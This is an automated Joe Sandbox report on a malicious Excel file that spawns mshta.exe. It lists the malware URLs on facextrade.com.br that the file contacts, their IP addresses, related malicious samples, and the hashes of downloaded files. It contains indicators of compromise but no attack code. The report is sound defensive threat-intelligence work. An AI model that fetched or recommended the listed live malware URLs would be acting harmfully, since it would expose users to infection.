                                    http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.202.1bmshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/style.csssYmshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes=JW&n?H4~bmshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.csssmshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://daneden.me/animateanimate-logo[1].css.8.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0rmshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0nlmshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/certificates/privacy-policymshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.319mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css_&mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3n.js?ver=1mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20R$mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/certificates/4mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/certificates/:mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/style.css...mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0http://facextrade.cmshta.exe, 00000008.00000002.1168275161.0000000002C80000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.jsmshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204172.1mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201Amshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20WVmshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/certificates/privacy-policyflatemshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20Time.js?ver=1.08mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3.NET4.0E)mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.22Wmshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20cssmshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.jplayer.orgmshta.exe, 00000008.00000002.1186574791.0000000009C8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, jquery.jplayer.min[1].js.8.dr, jplayer.playlist.min[1].js.8.drfalse
                                      high
                                      http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsJlmshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://facextrade.com.br/onmshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30.6mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSEmshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.theme.default.min[1].css.8.dr, owl.carousel.min[1].css.8.dr, owl.carousel[1].js.8.drfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.18.11.207
                                        netdna.bootstrapcdn.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        142.250.181.238
                                        www3.l.google.comUnited States
                                        15169GOOGLEUSfalse
                                        187.45.240.69
                                        facextrade.com.brBrazil
                                        27715LocawebServicosdeInternetSABRtrue
                                        IP
                                        127.0.0.1
                                        Joe Sandbox Version:35.0.0 Citrine
                                        Analysis ID:684646
                                        Start date and time:2022-08-16 10:47:31 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 7m 13s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:SecuriteInfo.com.Exploit.Siggen3.17149.8245.21810 (renamed file extension from 21810 to xls)
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLS@11/85@5/4
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 55
                                        • Number of non-executed functions: 2
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.181.234, 216.58.212.138, 172.217.16.195
                                        • Excluded domains from analysis (whitelisted): maps.googleapis.com, fonts.googleapis.com, fonts.gstatic.com
                                        • Execution Graph export aborted for target mshta.exe, PID 1464 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        TimeTypeDescription
                                        10:48:27API Interceptor2x Sleep call for process: taskkill.exe modified
                                        10:48:28API Interceptor649x Sleep call for process: mshta.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        104.18.11.207SecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                        http://emfs.co.za/wp-content/uploads/emfs-popia-privacy-policy-final.pdfGet hashmaliciousBrowse
                                        • netdna.bootstrapcdn.com/font-awesome/4.0.1/css/font-awesome.css
                                        187.45.240.69SecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13262.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17232.15725.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
                                        SecuriteInfo.com.Exploit.Siggen3.17232.14069.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17232.19740.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13662.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10970.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17232.7754.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10473.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0
                                        SecuriteInfo.com.Exploit.Siggen3.17232.17500.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-imcludes/as/444.txt
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        gstaticadssl.l.google.comSecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        00187679526.xlsxGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        00187679526.xlsxGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://ipfs.io/ipfs/QmfAndQD4wG6xZpoY4WWL48A9H5qKFYHayWXGx5CvY9zqW?filename=index.html#info@discoversaudi.saGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://1drv.ms/o/s!BNQ8gxErh5UyqzXqmlklq3e6FqQy?e=zWDj8VlDB0yYeUjfLHMDHg&at=9Get hashmaliciousBrowse
                                        • 172.217.16.195
                                        http://asweptomnd.bluwma.ml/5690394.htmlGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        http://0gomovies.ruGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://issuu.com/file.pdf_17kb/docs/faxmail_delivery_hs0087g?fr=sY2E1MzUyODMyOTYGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://cvent.me/Z9n2bO?i=nytmP1uA8EeMVcihhIIg-w&locale=en-USGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        http://mybuilder.ssdpage.com/free/acc15/mail/?=65311341Get hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://docs.google.com/presentation/d/e/2PACX-1vSU_FEiyu-gmac-VPaEaXqUbNKvs22dLZy1uvbXhZYw8a3d3_sqDueNGVBLuw4IT9UbtShAJmxz4Pt-/pub?start=false&loop=false&delayms=3000Get hashmaliciousBrowse
                                        • 172.217.16.195
                                        http://popcorntime-upd.xyz/?app_id=T4PSEC&hid=0c5247dc1a126f9bb3277f86bfa78ebd&ver=6.2.1.17&os=WIN060200Get hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://www.dropbox.com/scl/fi/jx7ou1xapexhaml2u2f55/You-have-been-invited-you-to-view-the-folder-PO48993_49110_.paper?dl=0&rlkey=3uyxpr3q1wftt7a6pywj57z0oGet hashmaliciousBrowse
                                        • 172.217.16.195
                                        https://www.chiesiusa.com/Get hashmaliciousBrowse
                                        • 172.217.16.195
                                        facextrade.com.brSecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13262.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.15725.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.14069.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.19740.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13662.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10970.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.7754.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10473.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.17500.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CLOUDFLARENETUSSecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        00187679526.xlsxGet hashmaliciousBrowse
                                        • 172.67.74.85
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 104.18.10.207
                                        00187679526.xlsxGet hashmaliciousBrowse
                                        • 172.67.74.85
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • 104.18.10.207
                                        SecuriteInfo.com.Trojan7000000f1.4274.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        SWIFT COPY & ADVICE.vbsGet hashmaliciousBrowse
                                        • 188.114.97.3
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • 104.18.10.207
                                        j5qTX83wwG.exeGet hashmaliciousBrowse
                                        • 104.18.115.97
                                        ATT11280.htmGet hashmaliciousBrowse
                                        • 104.17.25.14
                                        DHL_227040 al#U0131nd#U0131 belgesi,pdf.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        Fab's AutoBackup Pro 7.10.0 Build 5673.exeGet hashmaliciousBrowse
                                        • 188.114.97.3
                                        VThQPDycxy.batGet hashmaliciousBrowse
                                        • 104.21.43.80
                                        NextEra RFQ and Business Proposition.docxGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        Fab's AutoBackup Pro 7.10.0 Build 5673.exeGet hashmaliciousBrowse
                                        • 188.114.96.3
                                        INVOICES [W_ID11942885].exeGet hashmaliciousBrowse
                                        • 104.18.114.97
                                        PO#2022CTV05-47.exeGet hashmaliciousBrowse
                                        • 188.114.96.3
                                        LocawebServicosdeInternetSABRSecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13262.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.15725.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.14069.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.19740.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.13662.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10970.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.7754.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.10473.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17232.17500.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • 187.45.240.69
                                        CLqMCUCXCOGet hashmaliciousBrowse
                                        • 177.153.108.0
                                        i586-20220727-1401Get hashmaliciousBrowse
                                        • 187.45.228.62
                                        iGV79YZMmbGet hashmaliciousBrowse
                                        • 177.153.108.0
                                        6I5XtNRL9GGet hashmaliciousBrowse
                                        • 177.153.67.72
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Exploit.Siggen3.17149.13096.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        SecuriteInfo.com.Exploit.Siggen3.17149.5932.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        00187679526.xlsxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        SecuriteInfo.com.Exploit.Siggen3.17149.32408.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        PO#166809.xlsxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        ATT11280.htmGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        NextEra RFQ and Business Proposition.docxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        BL-20-89DS.docxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        NOA & Pre-loading docs of CBHU9101956.docxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        Product_specification_1.docxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        test.py.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        test.py.xlsGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        NOA & Pre-loading docs of CBHU9101956.docxGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        NewXOrder.xlsmGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        template[1].docGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        8SCdyagBIS.docGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        nwes.org.uk HENDERSON TRUST BID PACKAGE pdf.htmGet hashmaliciousBrowse
                                        • 142.250.181.238
                                        No context
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):13
                                        Entropy (8bit):2.469670487371862
                                        Encrypted:false
                                        SSDEEP:3:D90aKb:JFKb
                                        MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                        SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                        SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                        SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:<root></root>
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):28756
                                        Entropy (8bit):5.071148466705677
                                        Encrypted:false
                                        SSDEEP:768:EAkESlcDWdfi5SSjb60vPxMhdo2YSHZ/ZQesapu7odL:Y8ZMSmZ7z
                                        MD5:BE1C5898C4332C8E7F9906011E005BB0
                                        SHA1:9567F7B3FD78160203C5795D397128390381D8A3
                                        SHA-256:7C1D540B7034E4790ECE82622854C1FBF34F0D4297F3167D914FB09DDAE6CB4C
                                        SHA-512:0799162F87D2A6AC7932CECBE041FB3284EE64663C17BBADFE439E750E768D4EF4AA9A73BCC1353512AE0ADA813698DD8DD8372A753946F318BB265CAB2C2DAA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0
                                        Preview:/**.* Bootstrap.js by @fat & @mdo.* plugins: bootstrap-transition.js, bootstrap-modal.js, bootstrap-dropdown.js, bootstrap-scrollspy.js, bootstrap-tab.js, bootstrap-tooltip.js, bootstrap-popover.js, bootstrap-affix.js, bootstrap-alert.js, bootstrap-button.js, bootstrap-collapse.js, bootstrap-carousel.js, bootstrap-typeahead.js.* Copyright 2012 Twitter, Inc..* http://www.apache.org/licenses/LICENSE-2.0.txt.*/.!function(a){a(function(){a.support.transition=function(){var a=function(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"},c;for(c in b)if(a.style[c]!==undefined)return b[c]}();return a&&{end:a}}()})}(window.jQuery),!function(a){var b=function(b,c){this.options=c,this.$element=a(b).delegate('[data-dismiss="modal"]',"click.dismiss.modal",a.proxy(this.hide,this)),this.options.remote&&this.$element.find(".modal-body").load(this.options.remote)};b.pr
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):7063
                                        Entropy (8bit):4.760531090364714
                                        Encrypted:false
                                        SSDEEP:96:bHXKN1r0gCJ5e2zHdXv9CSjlvrOQLAn2jYU:bHaH0g4JXv9fJaWAn6p
                                        MD5:9CA23FDB7BD610BD719855071377B6EF
                                        SHA1:058963F75C878FA6E48671046293F9B70D35B5AB
                                        SHA-256:859D8F76737036B7C6475508DBA8DA8BD0764AA99CA5A9D4638FADC0238AB4A4
                                        SHA-512:15625C798E1402DACAFFBFBE064CD3D430D51FBB0E40890AD08A4F60389D24459C7B6E19030EDB32380377E73E0C387A819AB29AF308C5DE5C3E708AEA416556
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0
